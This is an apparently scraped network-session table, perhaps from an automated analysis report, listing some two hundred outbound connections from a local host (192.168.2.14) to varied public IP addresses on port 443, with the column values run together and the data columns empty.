                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16971192.168.2.1442058177.22.57.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16972192.168.2.1460426209.161.130.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16973192.168.2.1433388136.200.146.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16974192.168.2.1453600116.131.180.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16975192.168.2.143791649.224.35.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16976192.168.2.1444134207.34.82.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16977192.168.2.1456378132.92.193.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16978192.168.2.14575322.225.128.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16979192.168.2.1451828161.29.240.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16980192.168.2.1440628199.126.67.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16981192.168.2.144775285.119.154.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16982192.168.2.1436484161.44.80.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16983192.168.2.144181050.152.102.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16984192.168.2.143694640.53.203.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16985192.168.2.1436148188.194.17.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16986192.168.2.1451428172.136.38.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16987192.168.2.1444654168.170.12.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16988192.168.2.144736250.145.56.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16989192.168.2.144321873.74.119.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16990192.168.2.1439038136.192.3.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16991192.168.2.1455056217.190.92.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16992192.168.2.1447996101.30.96.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16993192.168.2.145124024.232.229.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16994192.168.2.1444920184.70.252.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16995192.168.2.1445226109.142.47.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16996192.168.2.1449382185.66.247.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16997192.168.2.1446576196.168.185.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16998192.168.2.1446632158.229.189.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16999192.168.2.1451386180.241.192.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17000192.168.2.143494879.176.22.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17001192.168.2.1437330175.33.164.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17002192.168.2.1449902173.169.157.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17003192.168.2.145191244.196.166.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17004192.168.2.1434424109.84.139.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17005192.168.2.144066664.173.119.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17006192.168.2.1433058112.60.79.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17007192.168.2.144352095.247.0.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17008192.168.2.1453834126.58.66.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17009192.168.2.1434654223.48.105.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17010192.168.2.14542741.181.82.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17011192.168.2.1439134186.36.112.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17012192.168.2.1457122208.102.0.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17013192.168.2.1456112216.9.116.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17014192.168.2.144675688.207.146.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17015192.168.2.1453074190.83.123.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17016192.168.2.1441666172.145.241.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17017192.168.2.1437468135.144.5.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17018192.168.2.1442170158.204.250.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17019192.168.2.143641020.222.251.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17020192.168.2.1452382104.65.59.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17021192.168.2.1451740191.177.234.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17022192.168.2.145526634.229.4.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17023192.168.2.1458276212.214.89.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17024192.168.2.1456922205.209.250.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17025192.168.2.1445328206.212.174.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17026192.168.2.1445230161.32.219.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17027192.168.2.1449624119.91.76.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17028192.168.2.145556069.189.190.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17029192.168.2.1439388119.248.46.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17030192.168.2.1437806149.191.31.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17031192.168.2.144837895.239.216.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17032192.168.2.1437286190.174.171.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17033192.168.2.14518841.193.9.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17034192.168.2.144345293.34.153.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17035192.168.2.145787249.248.174.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17036192.168.2.1437782209.163.180.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17037192.168.2.143537240.233.213.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17038192.168.2.145453232.32.66.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17039192.168.2.1447646195.121.185.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17040192.168.2.145008453.182.202.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17041192.168.2.1438392196.105.248.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17042192.168.2.1450842117.131.129.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17043192.168.2.14385241.252.78.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17044192.168.2.144085663.246.81.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17045192.168.2.1442674218.199.162.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17046192.168.2.143723838.68.78.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17047192.168.2.144045236.66.148.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17048192.168.2.1437268178.118.255.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17049192.168.2.144308473.202.49.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17050192.168.2.1456194120.16.182.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17051192.168.2.1453616178.157.99.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17052192.168.2.1437376149.22.231.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17053192.168.2.1453436155.138.242.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17054192.168.2.144653825.232.98.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17055192.168.2.1446676196.175.168.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17056192.168.2.1455524118.75.226.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17057192.168.2.1452972131.209.14.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17058192.168.2.1438296187.6.148.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17059192.168.2.1453276184.167.31.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17060192.168.2.1450850185.215.121.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17061192.168.2.145748651.254.71.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17062192.168.2.1444240176.91.28.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17063192.168.2.144055049.110.206.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17064192.168.2.144336681.3.245.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17065192.168.2.1450034141.98.246.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17066192.168.2.1446966117.119.76.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17067192.168.2.1437624107.59.155.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17068192.168.2.1459928111.124.183.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17069192.168.2.1454550123.229.13.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17070192.168.2.1460718198.185.99.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17071192.168.2.145670418.160.138.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17072192.168.2.1437732103.39.183.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17073192.168.2.1437834178.117.54.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17074192.168.2.1455554185.167.245.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17075192.168.2.144247619.59.137.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17076192.168.2.144057084.56.120.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17077192.168.2.1442154180.234.225.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17078192.168.2.1436288181.49.140.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17079192.168.2.145420248.151.203.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17080192.168.2.1457156178.41.90.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17081192.168.2.1438376167.123.115.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17082192.168.2.144770868.241.38.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17083192.168.2.1443020194.42.45.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17084192.168.2.144184023.222.168.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17085192.168.2.1440966219.192.13.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17086192.168.2.1458878203.108.52.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17087192.168.2.145378651.227.170.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17088192.168.2.144805832.168.40.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17089192.168.2.1443086166.105.229.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17090192.168.2.144545862.84.122.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17091192.168.2.1445808124.103.245.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17092192.168.2.14488341.65.193.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17093192.168.2.1443666121.101.167.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17094192.168.2.1438558107.117.15.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17095192.168.2.1450092139.76.153.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17096192.168.2.145290452.163.13.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17097192.168.2.1434386132.227.51.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17098192.168.2.1454324217.168.6.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17099192.168.2.1444454126.150.168.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17100192.168.2.1446374177.43.97.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17101192.168.2.144246832.248.26.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17102192.168.2.1459378134.111.66.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17103192.168.2.1441936213.161.232.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17104192.168.2.145075286.171.194.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17105192.168.2.145935812.127.247.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17106192.168.2.1447686144.170.242.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17107192.168.2.1434326204.82.72.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17108192.168.2.1436054200.61.159.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17109192.168.2.1456110136.186.35.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17110192.168.2.1435738135.72.202.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17111192.168.2.145185436.146.111.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17112192.168.2.144555434.178.221.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17113192.168.2.1454884202.137.193.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17114192.168.2.145291469.130.144.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17115192.168.2.1440520206.139.11.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17116192.168.2.144857088.251.0.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17117192.168.2.1437552221.93.203.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17118192.168.2.145658434.37.245.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17119192.168.2.1444012132.66.185.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17120192.168.2.145999420.213.14.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17121192.168.2.143469666.166.133.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17122192.168.2.1457728174.81.75.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17123192.168.2.1433486101.242.156.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17124192.168.2.143785889.172.79.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17125192.168.2.1435810183.210.19.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17126192.168.2.143743869.87.36.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17127192.168.2.144669697.204.187.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17128192.168.2.1459606166.94.188.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17129192.168.2.145141446.93.190.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17130192.168.2.143576498.14.43.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17131192.168.2.1444308105.205.37.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17132192.168.2.1435636213.41.255.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17133192.168.2.143336820.118.188.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17134192.168.2.1458842155.129.229.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17135192.168.2.145399653.59.150.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17136192.168.2.1450756135.33.77.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17137192.168.2.145455275.18.225.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17138192.168.2.145017614.136.126.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17139192.168.2.1436330126.29.141.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17140192.168.2.1453198103.76.96.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17141192.168.2.14472368.12.2.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17142192.168.2.1449290140.132.56.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17143192.168.2.144355260.243.78.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17144192.168.2.143619236.101.56.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17145192.168.2.144305474.31.243.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17146192.168.2.1447296162.160.57.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17147192.168.2.1460992141.44.79.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17148192.168.2.1456748212.148.211.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17149192.168.2.144927412.124.137.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17150192.168.2.1454362223.121.100.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17151192.168.2.1456756181.211.58.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17152192.168.2.1438168145.240.238.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17153192.168.2.1453728175.253.193.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17154192.168.2.145940271.95.195.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17155192.168.2.1433528219.240.100.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17156192.168.2.1448738205.80.108.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17157192.168.2.143619483.16.72.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17158192.168.2.144577049.58.109.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17159192.168.2.144683835.47.100.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17160192.168.2.143654623.90.28.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17161192.168.2.1455438175.82.66.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17162192.168.2.1445018152.121.37.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17163192.168.2.1452358169.45.51.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17164192.168.2.1454418204.130.187.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17165192.168.2.143408884.99.250.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17166192.168.2.1443172142.188.96.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17167192.168.2.1457060102.240.138.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17168192.168.2.1458222148.171.78.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17169192.168.2.1440736169.102.226.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17170192.168.2.1433056104.248.203.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17171192.168.2.1443866102.219.101.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17172192.168.2.1449446150.102.57.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17173192.168.2.1440452158.73.173.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17174192.168.2.143838098.87.42.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17175192.168.2.1451864190.11.195.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17176192.168.2.145594081.17.55.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17177192.168.2.1433908102.73.161.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17178192.168.2.144786295.66.229.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17179192.168.2.1459066104.10.121.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17180192.168.2.143385288.77.151.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17181192.168.2.144501424.34.206.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17182192.168.2.1445192141.36.173.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17183192.168.2.1460536147.55.5.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17184192.168.2.145858667.223.206.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17185192.168.2.1451512124.102.234.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17186192.168.2.1433480192.206.252.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17187192.168.2.1449222101.192.76.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17188192.168.2.1434626198.15.52.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17189192.168.2.143355060.5.208.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17190192.168.2.1447842132.215.179.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17191192.168.2.1453532219.137.56.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
